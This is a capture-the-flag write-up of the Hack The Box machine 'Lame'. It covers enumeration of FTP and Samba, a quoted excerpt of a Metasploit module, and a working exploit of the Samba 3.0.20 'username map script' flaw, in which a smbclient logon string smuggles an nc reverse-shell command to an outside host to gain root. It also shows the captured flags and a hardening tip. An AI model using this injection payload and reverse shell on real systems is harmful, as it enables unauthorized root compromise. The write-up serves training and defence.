Lame Writeup

Lame was the first box released on HTB (as far as I can tell). It’s a super easy box, easily knocked over with a Samba version exploit to a root shell.

System Vulnerable: 10.10.10.3

Vulnerability Explanation: The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the SamrChangePassword function, when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in the remote printer and file share management.

Vulnerability Fix: These vulnerabilities are addressed in Samba version 3.0.25. In addition, patches are available to address this vulnerability in Samba version 3.0.24. Refer to the Samba Security Releases website for more information.

Privilege Escalation Vulnerability: NONE

Vulnerability Fix: NONE

Severity: Critical

An initial nmap scan revealed a Samba as smbd 3.0.20-Debian version.

┌──(root💀kali)-[/root/CTF/htb/linux/lame]
└─# cat nmap/initial
# Nmap 7.92 scan initiated Sat Oct  1 22:23:01 2022 as: nmap -sC -sV -v -oN nmap/initial 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.31s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.16.7
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2022-10-01T17:23:54-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 2h00m09s, deviation: 2h49m47s, median: 5s

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct  1 22:24:25 2022 -- 1 IP address (1 host up) scanned in 84.15 seconds

FTP (21/tcp)

FTP Anonymous login is enabled , but no file / folder is shared.

┌──(root💀kali)-[/root/CTF/htb/linux/lame]
└─# ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 .
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 ..
226 Directory send OK.
ftp> cd /
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 .
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 ..
226 Directory send OK.
ftp>

Samba (445/tcp)

Using smbclinet , list all available services on the server.

┌──(root💀kali)-[/root/CTF/htb/linux/lame]
└─# smbclient -L 10.10.10.3                                                                                                                                                         130 ⨯
Enter WORKGROUP\kali's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	tmp             Disk      oh noes!
	opt             Disk      
	IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
	ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            LAME

Using the searchsploit tool, search for any public vulnerability related to samba 3.0.20 :

┌──(root💀kali)-[/root/CTF/htb/linux/lame]
└─# searchsploit samba 3.0.20
---------------------------------------------------------- ---------------------------------
 Exploit Title                                            |  Path
---------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass    | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                     | linux/remote/7701.txt
Samba < 3.0.20 - Remote Heap Overflow                     | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)             | linux_x86/dos/36741.py
---------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Reading the Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) exploit, and then use the same methodology to exploit the samba vulnerability.

... SNIP ...
def exploit
                connect
                # lol?
                username = "/=`nohup " + payload.encoded + "`"
                begin
                        simple.client.negotiate(false)
                        simple.client.session_setup_ntlmv1(username, rand_text(16), datastore['SMBDomain'], false)
                rescue ::Timeout::Error, XCEPT::LoginError
                        # nothing, it either worked or it didn't ;)
                end

                handler
        end
... SNIP ...

Access to the shared disk (tmp) using smbclient .

┌──(root💀kali)-[/root/CTF/htb/linux/lame]
└─# smbclient //10.10.10.3/tmp                                                                                                                                                        1 ⨯
Enter WORKGROUP\kali's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Oct  1 22:56:43 2022
  ..                                 DR        0  Sat Oct 31 07:33:58 2020
  5559.jsvc_up                        R        0  Sat Oct  1 22:14:04 2022
  .ICE-unix                          DH        0  Sat Oct  1 22:13:03 2022
  vmware-root                        DR        0  Sat Oct  1 22:13:35 2022
  .X11-unix                          DH        0  Sat Oct  1 22:13:27 2022
  .X0-lock                           HR       11  Sat Oct  1 22:13:27 2022
  vgauthsvclog.txt.0                  R     1600  Sat Oct  1 22:13:01 2022

		7282168 blocks of size 1024. 5386516 blocks available
smb: \>

Launch a local nc listener on the local machine and execute the exploit as the follow:

session setup failed: NT_STATUS_LOGON_FAILURE
smb: \> logon "/=`nohup nc -e /bin/sh 10.10.16.7 9001 `"
Password:

On this step, enter any password.

A reverse shell is received as user root :

┌──(root💀kali)-[/root/CTF/htb/linux/lame]
└─# nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.3] 42753
whoami
root

For further step, we can spawn shell using python as the following to make the shell more readable.

┌──(root💀kali)-[/root/CTF/htb/linux/lame]
└─# nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.3] 45036
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
root@lame:/#

Proof - User

root@lame:/home/makis# cat user.txt && hostname && whoami && ifconfig
cat user.txt && hostname && whoami && ifconfig
19c9caccaf70854950bc41eaf663a9e6
lame
root
eth0      Link encap:Ethernet  HWaddr 00:50:56:b9:70:16  
          inet addr:10.10.10.3  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb9:7016/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:7016/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:269886 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1269 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:18105748 (17.2 MB)  TX bytes:131780 (128.6 KB)
          Interrupt:19 Base address:0x2024 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:560 errors:0 dropped:0 overruns:0 frame:0
          TX packets:560 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:253297 (247.3 KB)  TX bytes:253297 (247.3 KB)

root@lame:/home/makis#

Proof - Root

root@lame:/root# cat root.txt && hostname && whoami && ifconfig
cat root.txt && hostname && whoami && ifconfig
22875beab6b5c2f46568db03157a46f6
lame
root
eth0      Link encap:Ethernet  HWaddr 00:50:56:b9:70:16  
          inet addr:10.10.10.3  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb9:7016/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:7016/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:269842 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1249 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:18102276 (17.2 MB)  TX bytes:128941 (125.9 KB)
          Interrupt:19 Base address:0x2024 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:556 errors:0 dropped:0 overruns:0 frame:0
          TX packets:556 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:251253 (245.3 KB)  TX bytes:251253 (245.3 KB)

root@lame:/root#

Hardening Tip

Change the value of guest ok = yes to guest ok = no on /etc/samba/smb.conf as the following

  • smb.conf before the change

[tmp]
   comment = oh noes!
   read only = no
   locking = no
   path = /tmp
   guest ok = yes

  • smb.conf after the change

[tmp]
   comment = oh noes!
   read only = no
   locking = no
   path = /tmp
   guest ok = no

If we try to access the server as we did before as NT_STATUS_ACCESS_DENIED message is shown:

┌──(root💀kali)-[/root/CTF/htb/linux/lame]
└─# smbclient //10.10.10.3/tmp

Enter WORKGROUP\kali's password: 
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIED
PreviousHTB Linux BoxesNextBashed Writeup

Last updated